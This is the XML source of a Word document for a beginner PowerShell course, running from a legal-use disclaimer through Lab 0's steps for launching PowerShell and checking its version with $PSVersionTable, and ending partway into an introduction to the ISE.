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5FCFF" w14:textId="77777777" w:rsidR="00C51AB4" w:rsidRDefault="00C51AB4" w:rsidP="00F256E3">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
      </w:pPr>
      <w:r w:rsidRPr="008E0868">
        <w:rPr>
          <w:rStyle w:val="Heading1Char"/>
        </w:rPr>
        <w:t>Disclaimer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r>
        <w:t>All information/techniques/scripts and other intellectual materials shared as part of this course and labs are meant teach you the basics of PowerShell and how to leverage it to interact with the Windows operating system. Feel free to use them on any legal engagement/contract.  I do not condone doing anything you learned for illegal purposes, and can ensure you if you do, you will likely end up in jail – you’ve been warned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63676E9E" w14:textId="77777777" w:rsidR="00C51AB4" w:rsidRPr="00C51AB4" w:rsidRDefault="00C51AB4" w:rsidP="00F256E3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C51AB4">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Materials Required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120B9525" w14:textId="77777777" w:rsidR="00C51AB4" w:rsidRPr="003402C7" w:rsidRDefault="00C51AB4"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These labs are written with Windows PowerShell 2.0+ in mind and as such students are expected to have a Windows PC (VM Ok) with the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61656C94" w14:textId="77777777" w:rsidR="00C51AB4" w:rsidRPr="003402C7" w:rsidRDefault="00C51AB4" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:num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Internet connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B035631" w14:textId="77777777" w:rsidR="00C51AB4" w:rsidRPr="003402C7" w:rsidRDefault="00C51AB4" w:rsidP="003C407F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:num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PowerShell 2.0 or higher.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0E42E9" w14:textId="77777777" w:rsidR="00C51AB4" w:rsidRDefault="00C51AB4" w:rsidP="00F256E3">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3029A575" w14:textId="77777777" w:rsidR="00C51AB4" w:rsidRPr="0003746C" w:rsidRDefault="00C51AB4" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="IntenseEmphasis"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003746C">
        <w:rPr>
          <w:rStyle w:val="IntenseEmphasis"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Food for Thought</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="IntenseEmphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="IntenseEmphasis"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that Windows has opened sourced PowerShell it can be downloaded and used on MAC and Linux distributions. After this class we recommend that you download one of these other versions and seeing what the differences/similarities are. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD57EA" w14:textId="77777777" w:rsidR="00C51AB4" w:rsidRDefault="00C51AB4" w:rsidP="00F256E3">
      <w:pPr>
        <w:pStyle w:val="Style2"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22E280C1" w14:textId="77777777" w:rsidR="008E0868" w:rsidRDefault="00C51AB4" w:rsidP="00F256E3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C51AB4">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00B8210D" w:rsidRPr="00C51AB4">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ab </w:t>
      </w:r>
      <w:r w:rsidRPr="00C51AB4">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00B8210D" w:rsidRPr="00C51AB4">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008E0868">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Getting Started</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6672304C" w14:textId="77777777" w:rsidR="00302066" w:rsidRPr="00C51AB4" w:rsidRDefault="008E0868" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Who says you have to start with 1?</w:t>
      </w:r>
      <w:r w:rsidR="00C51AB4" w:rsidRPr="00C51AB4">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B3B8B0" w14:textId="77777777" w:rsidR="00302066" w:rsidRPr="008E0868" w:rsidRDefault="00302066" w:rsidP="00082B5F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E0868">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC1130E" w14:textId="77777777" w:rsidR="00BD442A" w:rsidRPr="003402C7" w:rsidRDefault="008E0868" w:rsidP="00CA4184">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003402C7">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The objectives of this lab is to successfully navigate to a PowerShell window, determine what version you are running, and if you so choose to upgrade to the latest version. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C04AEC3" w14:textId="77777777" w:rsidR="008E0868" w:rsidRDefault="008E0868" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB17543" w14:textId="77777777" w:rsidR="00BD442A" w:rsidRDefault="008E0868" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003746C">
        <w:rPr>
          <w:rStyle w:val="IntenseEmphasis"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Food for Thought</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="IntenseEmphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="IntenseEmphasis"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Upgrading allows you to take full advantage of the newer features built into PowerShell, to include tighter security controls and logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EC6015" w14:textId="77777777" w:rsidR="00302066" w:rsidRDefault="00302066" w:rsidP="00082B5F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t>Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2EF02D" w14:textId="77777777" w:rsidR="00BD442A" w:rsidRPr="003A12DF" w:rsidRDefault="00BD442A" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C0D36D" w14:textId="77777777" w:rsidR="00302066" w:rsidRPr="003A12DF" w:rsidRDefault="00302066"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time:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A12DF">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:w w:val="120"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B86E42">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10-15</w:t>
      </w:r>
      <w:r w:rsidRPr="003A12DF">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> minutes</w:t>
      </w:r>
      <w:r w:rsidR="008E0868">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (if you upgrade).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7BD7B6" w14:textId="77777777" w:rsidR="00B86E42" w:rsidRDefault="00B86E42" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C0F3629" w14:textId="77777777" w:rsidR="00302066" w:rsidRDefault="008E086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you choose to upgrade, this lab will take about 10-15 minutes of time all dependent on the bandwidth and download speeds. Otherwise this lab can be finished in less than 5 minutes.  If you have used PowerShell before please feel free to skip this lab all together – we assumed that this would be the first taste of PowerShell for some students and therefore started with the basics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9DA2F4" w14:textId="77777777" w:rsidR="00074E1F" w:rsidRDefault="00074E1F" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20813F63" w14:textId="77777777" w:rsidR="00074E1F" w:rsidRDefault="00074E1F"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rsidR="008E0868" w:rsidRPr="0092211A">
        <w:t>Launching</w:t>
      </w:r>
      <w:r w:rsidR="008E0868">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19697D27" w14:textId="77777777" w:rsidR="001102B9" w:rsidRDefault="001102B9" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Launch the windows run command by clicking the windows key and the r key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF2FFE1" w14:textId="77777777" w:rsidR="001102B9" w:rsidRPr="001102B9" w:rsidRDefault="001102B9" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48DF2A32" wp14:editId="3462AB50">
            <wp:extent cx="2130949" cy="694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0810" cy="694249"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F5C37" w14:textId="77777777" w:rsidR="00074E1F" w:rsidRDefault="001102B9" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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ing so brings up the “Run” dialogue box, similar (depending on your OS it may look slightly different) to below</w:t>
      </w:r>
      <w:r w:rsidR="00074E1F">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E917F06" w14:textId="77777777" w:rsidR="009B0208" w:rsidRDefault="001102B9" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4852EC29" wp14:editId="303AC167">
            <wp:extent cx="3097497" cy="149699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0366" cy="1498378"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC2E93C" w14:textId="77777777" w:rsidR="00074E1F" w:rsidRDefault="00074E1F" w:rsidP="00F256E3"/>
    <w:p w14:paraId="467A9DC1" w14:textId="77777777" w:rsidR="00074E1F" w:rsidRDefault="001102B9"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 xml:space="preserve">In the dialogue box type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and hit “OK”/”Run”.  This will bring up PowerShell console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6902D1CC" w14:textId="77777777" w:rsidR="0003746C" w:rsidRDefault="001102B9"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 xml:space="preserve">Click in the PowerShell window and type: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C377366" w14:textId="77777777" w:rsidR="0092211A" w:rsidRDefault="001102B9" w:rsidP="00F256E3">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001102B9">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001102B9">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PSVersionTable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001102B9">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0092211A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6652E64C" w14:textId="77777777" w:rsidR="009251DB" w:rsidRDefault="009251DB"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Notice how $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PSVersionTable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> starts with a $ sign? – This is how you can tell it’s a variable – in this case a built in variable housing versioning information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1559CE13" w14:textId="77777777" w:rsidR="0092211A" w:rsidRDefault="0092211A"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The command will return something similar to (note on the system I took the screenshot on is running PowerShell 5):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314367ED" w14:textId="77777777" w:rsidR="0092211A" w:rsidRDefault="0092211A" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="591A6475" wp14:editId="648CC6C0">
            <wp:extent cx="41052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1752600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F6AB58" w14:textId="77777777" w:rsidR="0092211A" w:rsidRDefault="0092211A"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For the lazy – PowerShell has tab completion. You could have typed $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>psv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab to get the same thing. More on this later but don’t be afraid to tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1803F1" w14:textId="77777777" w:rsidR="0003746C" w:rsidRDefault="00020640"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The $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PS</w:t>
      </w:r>
      <w:r w:rsidR="0092211A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VersionTable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0092211A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a built in variable for all versions of PowerShell above 1.0. If the above command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0092211A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doesent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0092211A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> return anything then you know you’re running 1.0 – and if you are then yes you need to upgrade.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Variable? Don’t worry we’ll cover that soon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075C1E81" w14:textId="77777777" w:rsidR="00C65561" w:rsidRDefault="00C65561"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Close the PowerShell console by clicking the x button or typing “exit”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740AFF45" w14:textId="77777777" w:rsidR="0092211A" w:rsidRDefault="0092211A"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That’s it your done the first stage of Lab 0 – don’t worry they get harder from here… but you’ll do fine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EFF40C" w14:textId="77777777" w:rsidR="0092211A" w:rsidRDefault="0092211A" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64726578" w14:textId="77777777" w:rsidR="0003746C" w:rsidRDefault="0003746C"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92211A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00020640">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Integrated Scripting Environment (</w:t>
      </w:r>
      <w:r w:rsidR="0092211A">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ISE</w:t>
      </w:r>
      <w:r w:rsidR="00020640">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ABA921" w14:textId="77777777" w:rsidR="0003746C" w:rsidRDefault="0092211A" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The PowerShell command window gives us the tools to run PowerShell </w:t>
      </w:r>
      <w:r w:rsidR="00C65561">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>commands; however it is not the best place to learn PowerShell Scripting. For that we turn to the ISE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B84061E" w14:textId="77777777" w:rsidR="00C65561" w:rsidRDefault="00C65561" w:rsidP="006D4A11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C65561">
        <w:rPr>
          <w:rStyle w:val="CharacterStyle2"/>
          <w:rFonts w:ascii="Garamond" w:hAnsi="Garamond" w:cs="Garamond"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
